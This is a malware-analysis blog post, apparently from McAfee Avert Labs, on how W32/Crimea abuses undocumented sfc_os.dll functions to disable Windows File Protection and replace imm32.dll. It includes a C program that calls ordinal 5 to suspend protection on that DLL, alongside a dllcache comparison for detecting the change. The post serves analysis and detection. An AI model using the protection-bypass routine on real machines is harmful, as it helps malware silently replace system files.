Today, at McAfee Avert Labs, we came across an interesting piece of malware, W32/Crimea, that uses an undocumented feature of Windows File Protection to get at a protected system file.
Windows File Protection (WFP) is a feature of the Windows operating system that prevents other programs from modifying, replacing or deleting critical system files. SFC.dll and SFC_OS.dll contain the functions used to monitor those files. Earlier malware patched these DLLs or modified the registry to disable the feature; we blogged earlier about some of the techniques malware uses against Windows files.
Patching SFC.dll and SFC_OS.dll rendered some of the system defenses useless, but anti-virus companies found a way to identify the patched DLLs and provided remedies to clean the infection from the user's computer. Once again, malware authors have found an alternative: undocumented functions exported by SFC_OS.dll itself.
Those who went looking found a jackpot. The functions worth mentioning here are:
1. Ordinal 2: SfcTerminateWatcherThread
2. Ordinal 5: SetSfcFileException
The ordinal 2 function terminates the system file watcher thread, as the name implies, and from then until the next reboot the system is open to any directory or file modification by the malware. Because the watcher thread lives in winlogon.exe (the process that loads sfc_os.dll to provide the protection), the malware must inject code into winlogon.exe and call the function from there.
The ordinal 5 function disables WFP for one particular file, normally for one minute. That is all the time the malware needs to do its work. After the minute is up the protection is back, but the system is already infected: the file on disk is now the malware's version. Note that this trick does not touch the copy WFP keeps in %SystemRoot%\system32\dllcache, so comparing the live file against the cached copy (or running sfc /scannow) still exposes and repairs the change, unless the malware replaces the cached copy as well. Even though these techniques have been public for more than a year, we still see them in current malware. W32/Crimea uses the second method to infect the system file imm32.dll.
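The following program is an added example, written for this post; it is not McAfee's code and not code taken from W32/Crimea. It shows the two things described above from an analyst's side: how a process resolves sfc_os.dll ordinal 5 by number (the export has no name) and asks WFP to ignore one file, and the check to run afterwards, a byte-for-byte comparison of the live system32 file against the dllcache copy. The call signature (0, full wide path, -1) with 0 returned on success is the behaviour reported for Windows 2000/XP, not Microsoft documentation, and the imm32.dll path is the XP default; both are assumptions. Only the file comparison compiles on non-Windows systems. Run the exception part in a throwaway VM.

```c
/* wfp_probe.c - added example, not McAfee's or W32/Crimea's code.
 * Assumptions: sfc_os.dll ordinal 5 takes (0, full wide path, -1) and returns
 * 0 on success (as reported for 2000/XP, undocumented); the target path is the
 * XP default. Build on Windows with MinGW: gcc -o wfp_probe wfp_probe.c */
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>

/* sfc_os.dll ordinal 5 (SetSfcFileException): undocumented, signature assumed. */
typedef DWORD (WINAPI *SfcFileException_t)(DWORD dwUnknown0, PWCHAR pwszFile, DWORD dwUnknown1);
/* sfc.dll SfcIsFileProtected: documented. */
typedef BOOL (WINAPI *SfcIsFileProtected_t)(HANDLE RpcHandle, LPCWSTR ProtFileName);

/* 1 if WFP protects path, 0 if not, -1 if sfc.dll could not be used. */
int wfp_is_protected(const wchar_t *path)
{
    HMODULE h = LoadLibraryW(L"sfc.dll");
    if (!h) return -1;
    SfcIsFileProtected_t fn = (SfcIsFileProtected_t)GetProcAddress(h, "SfcIsFileProtected");
    return fn ? (fn(NULL, path) ? 1 : 0) : -1;
}

/* Registers the ~60 s WFP exception for path. Returns 0 on success, -1 if the
 * ordinal could not be resolved, otherwise the code the function returned.
 * sfc_os.dll is left loaded on purpose. */
int wfp_file_exception(const wchar_t *path)
{
    HMODULE h = LoadLibraryW(L"sfc_os.dll");
    if (!h) return -1;
    /* No exported name: GetProcAddress accepts the ordinal in place of a name. */
    SfcFileException_t fn = (SfcFileException_t)GetProcAddress(h, MAKEINTRESOURCEA(5));
    if (!fn) return -1;
    return (int)fn(0, (PWCHAR)path, (DWORD)-1);
}
#endif /* _WIN32 */

/* Writes n bytes to path. 0 on success, -1 on failure (used to build test inputs). */
int write_file(const char *path, const void *data, size_t n)
{
    FILE *f = fopen(path, "wb");
    if (!f) return -1;
    size_t w = fwrite(data, 1, n, f);
    return (fclose(f) == 0 && w == n) ? 0 : -1;
}

/* Byte-for-byte comparison: 1 identical, 0 different, -1 if a file cannot be opened.
 * Comparing system32\imm32.dll with system32\dllcache\imm32.dll exposes a DLL that
 * was changed while WFP looked away; sfc /scannow restores it from the cache. */
int files_identical(const char *a, const char *b)
{
    FILE *fa = fopen(a, "rb");
    FILE *fb = fopen(b, "rb");
    if (!fa || !fb) {
        if (fa) fclose(fa);
        if (fb) fclose(fb);
        return -1;
    }
    unsigned char ba[4096], bb[4096];
    int same = 1;
    for (;;) {
        size_t na = fread(ba, 1, sizeof ba, fa);
        size_t nb = fread(bb, 1, sizeof bb, fb);
        if (na != nb || memcmp(ba, bb, na) != 0) { same = 0; break; }
        if (na == 0) break;  /* both at EOF, no difference seen */
    }
    fclose(fa);
    fclose(fb);
    return same;
}

int main(int argc, char **argv)
{
    /* wfp_probe <file_a> <file_b>   compare two files (e.g. live DLL vs dllcache copy)
     * wfp_probe --exception         Windows only: open the one-minute window on imm32.dll */
    if (argc == 3) {
        printf("%s vs %s: %d\n", argv[1], argv[2], files_identical(argv[1], argv[2]));
        return 0;
    }
#ifdef _WIN32
    if (argc == 2 && strcmp(argv[1], "--exception") == 0) {
        const wchar_t *target = L"C:\\WINDOWS\\system32\\imm32.dll"; /* assumed XP path */
        printf("protected before: %d\n", wfp_is_protected(target));
        printf("exception rc:     %d\n", wfp_file_exception(target));
        printf("for about a minute a write to imm32.dll is not reverted\n");
        return 0;
    }
#endif
    fprintf(stderr, "usage: wfp_probe <file_a> <file_b> | --exception\n");
    return 1;
}
```

The ordinal 2 path is deliberately not shown: SfcTerminateWatcherThread only has an effect when called inside winlogon.exe, which means code injection into that process, and nothing in this post needs that to make its point.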
One might well ask why Microsoft provides APIs in Windows that leave the operating system open to malware like this. One reason could be to let system files be updated and patches installed. But it also gives malware an easy way to infect the system.
Ironically, Microsoft is providing a way to disable its own protection using its own APIs. So, is this API a feature, or a flaw?